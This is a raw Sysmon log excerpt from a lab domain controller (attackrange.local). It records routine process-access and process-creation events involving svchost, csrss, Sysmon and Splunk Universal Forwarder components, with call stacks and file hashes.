10341000x80000000000000004352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:44.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.639{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:44.640{59A5CD1D-8F28-6005-EB00-00000000A301}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.468{59A5CD1D-8F29-6005-EC00-00000000A301}49925044C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.327{59A5CD1D-8F29-6005-EC00-00000000A301}4992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:37:45.999{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F29-6005-ED00-00000000A301}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 